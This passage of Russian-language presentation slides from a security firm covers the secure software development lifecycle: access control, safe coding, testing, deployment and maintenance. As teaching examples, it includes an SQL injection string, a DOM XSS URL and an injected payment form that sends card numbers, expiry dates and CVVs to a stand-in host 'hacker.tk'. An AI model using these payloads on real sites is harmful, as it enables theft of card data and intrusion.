  • 14. 1-14 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Корректное управление доступомГость Пользователь Оператор Администратор Просмотр товаров     Добавление товаров x x x  Покупка товара X  x  Просмотр корзины x    Просмотр пользователей x x   Добавление и изменение пользователей x x x  Журнал транзакций x x   Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 15. 1-15 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 3: разработка кода • Минимизировать использование небезопасных функций: – PHP: exec(), system(), shell_exec(), passthru() – C++: strcpy(), wsprintf(), _fstrncat() • Использование анти-XSS библиотек: – Microsoft Anti-Cross Site Scripting Library; – снижение производительности. • Использование канонического формата данных: – гггг-мм-дд чч:ми:сс – URL-кодировка. • Избежание конкатенации строк в динамических SQL-запросах: $sql=“SELECT * FROM tab WHERE pass=“+$pass; $pass=1 OR 1=“; Итог: $sql=“SELECT * FROM tab WHERE pass=1 OR 1=1”; Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 16. 1-16 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Принципы разработки • Эффективное комментирование кода: – читаемость кода; – смена разработчика. • Модульное программирование: – логическая независимость; – один вход и один выход. • Парное программирование: – смена работника. • Работа с памятью. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 17. 1-17 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Принципы разработки • Защищенное взаимодействие: – отключение 80-го порта; – TLS 1.1 и выше; – Wildcard-сертификаты; • Корректная регистрация событий: – дата и время события; – источник события; – информация о событии. • Контроль целостности кода: – исполняемые файлы; – файлы конфигураций. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 18. 1-18 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 4: тестирование приложения Написание кода Анализ кода Функциональное тестирование Тестирование по безопасности Успешно? Успешно? Успешно? LДА LДА LДА LНЕТ LНЕТ LНЕТ Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 19. 1-19 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Анализ кода • визуальный (немного строк): – перекрестная проверка; – отдельный работник; • автоматический (большое количество строк): – коммерческие; – с открытым исходным кодом; – собственная разработка. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 20. 1-20 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Выявление уязвимостей в коде http://victim.com/test_eval.html#alert(1) Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 21. 1-21 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Запрет встраивания в код аутентификационных данных Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 22. 1-22 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Тестирование на безопасность Тестирование на безопасность: • выполнение требований стадии 1: – не делает того, чего делать не должно; • автоматическое сканирование на уязвимости кода: – Web Application (Vulnerability) Scanning; • тестирование на проникновение; • проверка входа и выхода; • фаззинг (случайные данные). Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 23. 1-23 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Фильтрация всех вводимых и выводимых данных • JavaScript-код: – FirstName = Vvedite PAN<form action="http://hacker.tk/log.php" method="POST"><input type='text‘ • HTML-код: – http://hacker.tk/ref.html?';});</script><html><form action='http://hacker.tk/log.php' method='POST'></br>vvedite PAN<input type='text' name = 'pan'/><br>vvedite expdate<input type=text name='expdate'/><br>vvedite cvv<input type='text' name='cvv'/><input type='submit' name='submit' value = 'Оплатить'/></form></html> • Фильтрация управляющих символов языков JavaScript, HTML и SQL; • Проверка данных на стороне сервера. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 24. 1-24 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Принципы тестирования • тестовые серверы; • тестовые данные; • разделение сред на канальном, сетевом и прикладном уровне; • разделение полномочий: – тестировщик != программист; – программист != администратор. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 25. 1-25 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Разделение сред на канальном уровне Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка PRODUCTIVE TESTTEST PRODUCTIVE Internet LogServer 10.250.10.44/30 10.250.10.43/30 10.250.10.13/30 10.250.10.14/30 10.250.30.18/30 10.250.30.17/30 PRODUCTIVE TerminalServer 10.250.10.24/30 10.250.10.23/30 WebSever1 TestServer1
  • 26. 1-26 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 5: перевод в боевую среду • Удаление тестовых данных: – логины и пароли: • test/test, adm/test, user/test. – пользовательские данные и настройки: • test_01@gmail.com, изображения профиля, иные данные. – тестовые данные платежных карт; – тестовые веб-страницы. • Закрытие доступа к служебным страницам: – git, phpinfo(), icons. • Отключение debug-режима: – log.txt: • logon.fx: … id=PaulBonne … passw=15uI_KO90iJe … success • payment.fx: … PAN=45672636145245365 … success Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 27. 1-27 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 5: перевод в боевую среду • Формирование пакета для развертывания: – file1, file2, file3, todo.txt. • Формирование процедуры отката: – Если … то … • Анализ логов на предмет ошибок. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 28. 1-28 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 6: поддержка • Сканирование сетевой инфраструктуры: – внутреннее; – внешнее. • Тестирование на проникновение: – внутреннее; – внешнее. • Регулярное обновление инфраструктуры; • Отслеживание уязвимостей; • Регулярный анализ логов; • Формирование заданий на доработку. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 29. 1-29 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Изменение кодаЗапрос на изменение кода Успешно? Разработка кода изменения Анализ кода Функциональное тестирование Успешно? Включение в релиз Функциональное тестирование релиза Тестирование релиза на безопасность Формирование пакета обновления, заявка на обновление релиза, процедура отката НЕТ ДА ДА Успешно? НЕТ ДА Успешно? Исключение изменения из релиза НЕТ НЕТ ДА Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 30. 1-30 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Резюме Стадии Функциональность Безопасность Разработка требований Функциональность, переносимость, технология Требования к безопасности Проектирование Архитектура, функции, потоки данных Моделирование функций безопасности, моделирование угроз Разработка кода Функциональное тестирование, тестовые данные Анализ кода, тестирование на безопасностьТестирование приложения Перевод в боевую среду Удаление тестовых данных, процедура отката Поддержка Написание новых модулей Соблюдение цикла безопасной разработки Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
  • 31. Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Контакты • kristina.andreeva@deiteriy.com • simon.uvarov@deiteriy.com 1-31